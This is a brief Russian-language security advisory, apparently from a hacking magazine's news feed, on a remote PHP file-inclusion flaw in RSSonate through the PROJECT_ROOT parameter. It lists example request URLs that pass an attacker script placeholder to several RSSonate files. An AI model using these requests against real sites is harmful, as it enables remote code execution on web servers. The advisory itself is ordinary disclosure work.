PHP-инклюдинг в RSSonate

Программа: RSSonate

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «PROJECT_ROOT» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://site.com/[path]/Src/getFeed/inc/xml2rss.php?PROJECT_ROOT=[Evil_Script]
http://site.com/[path]/Src/getFeed/inc/config_local.php?PROJECT_ROOT=[Evil_Script]
http://site.com/[path]/Src/getFeed/inc/rssonate.php?PROJECT_ROOT=[Evil_Script]
http://site.com/[path]/Src/getFeed/inc/sql2xml.php?PROJECT_ROOT=[Evil_Script]
http://site.com/[path]/Src/getFeed/inc/xml2rss.php?PROJECT_ROOT=[Evil_Script]

"Анатолий Ализар : Постоянный автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.."